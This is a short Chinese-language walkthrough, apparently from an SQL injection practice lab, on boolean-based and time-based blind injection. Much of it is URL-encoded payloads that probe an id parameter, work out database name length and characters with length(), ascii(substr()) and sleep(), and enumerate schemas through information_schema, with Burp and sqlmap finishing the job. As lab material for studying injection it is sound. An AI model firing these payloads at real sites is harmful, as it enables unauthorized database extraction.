1.布尔型盲注 判断注入类型 /?id=1%27%20%20and%201=1%20--+ /?id=1%27%20%20and%201=2%20--+ 两个页面有不一样的地方，因此为布尔型盲注 判断当前数据库名长度 /?id=1%27%20and%20length((select%20database()))>1--+ /?id=1%27%20and%20length((select%20database()))>10--+ /?id=1%27%20and%20length((select%20database()))>7--+ /?id=1%27%20and%20length((select%20database()))>8--+ 当前数据库名长度为8位 通过information_schema查询数据库名长度 id=1%27%20and%20length((select%20schema_name%20from%20information_schema.schemata%20limit%200,1))>8%20--+ id=1%27%20and%20length((select%20schema_name%20from%20information_schema.schemata%20limit%200,1))>20%20--+ id=1%27%20and%20length((select%20schema_name%20from%20information_schema.schemata%20limit%200,1))=18%20--+ id=1%27%20and%20ascii(substr((select%20schema_name%20from%20information_schema.schemata%20limit%200,1),1,1))=100%20--+ 为了方便我用burp抓包爆破 第一位为i id=1%27%20and%20ascii(substr((select%20schema_name%20from%20information_schema.schemata%20limit%200,1),12,1))=100%20--+ 通过以上方法得到第一个数据库为information_schema id=1%27%20and%20ascii(substr((select%20schema_name%20from%20information_schema.schemata%20limit%206,1),12,1))>1%20--+ 判断数据库个数用limit 用sqlmap跑出其他数据库名字 剩下的用sqlmap完成，跑表名 2.时间型盲注 用‘" and 1=1 --+’ 页面和 ‘" and 1=2 --+’页面完全一样 id=1"%20and%20sleep(5)%20--+ 页面延时加载 判断当前数据库长度 id=1"%20and%20if(length((select%20database()))>1,sleep(5),1)%20--+ id=1"%20and%20if(length((select%20database()))=8,sleep(5),1)%20--+ 因此当前数据库长度为8 推测第一个字母 id=1"%20and%20if(ascii(substr((select%20database()),1,1))>8,sleep(5),1)%20--+ 同时用burp爆破，将if(条件,sleep(1000),sleep(1))，方便在结果中查找正确的ASCII码值 剩下的用sqlmap跑